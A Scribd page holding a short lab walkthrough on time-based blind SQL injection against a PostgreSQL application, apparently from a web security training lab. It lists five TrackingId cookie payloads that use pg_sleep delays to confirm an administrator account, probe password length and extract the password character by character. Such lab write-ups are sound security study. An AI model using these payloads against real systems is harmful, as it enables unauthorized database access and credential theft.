Scribd
Upload
7 views1 page

Lab Blind SQL injection with time d

The document outlines a lab exercise on blind SQL injection techniques using time delays to retrieve information from a database. It provides step-by-step instructions for verifying conditions related to user existence and password characteristics through crafted SQL queries. Each step demonstrates how to manipulate the application response time to infer data about the 'administrator' user account.

Uploaded by

Jizel Ziadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
7 views1 page

Lab Blind SQL injection with time d

The document outlines a lab exercise on blind SQL injection techniques using time delays to retrieve information from a database. It provides step-by-step instructions for verifying conditions related to user existence and password characteristics through crafted SQL queries. Each step demonstrates how to manipulate the application response time to infer data about the 'administrator' user account.

Uploaded by

Jizel Ziadi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

Lab: Blind SQL injection with time delays and information retrieval

1/Verify that the application takes 10 seconds to respond.

TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

2/

Verify that the application responds immediately with no time delay. This
demonstrates how you can test a single boolean condition and infer the result.

TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--

3/

Verify that the condition is true, confirming that there is a user called
administrator.

TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')
+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

4/
This condition should be true, confirming that the password is greater than 1
character in length.

TrackingId=x'%3BSELECT+CASE+WHEN+
(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0
)+END+FROM+users--

5/
This uses the SUBSTRING() function to extract a single character from the password,
and test it against a specific value.

TrackingId=x'%3BSELECT+CASE+WHEN+
(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')
+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

// use add paylod for 'a' and the postion $1$

You might also like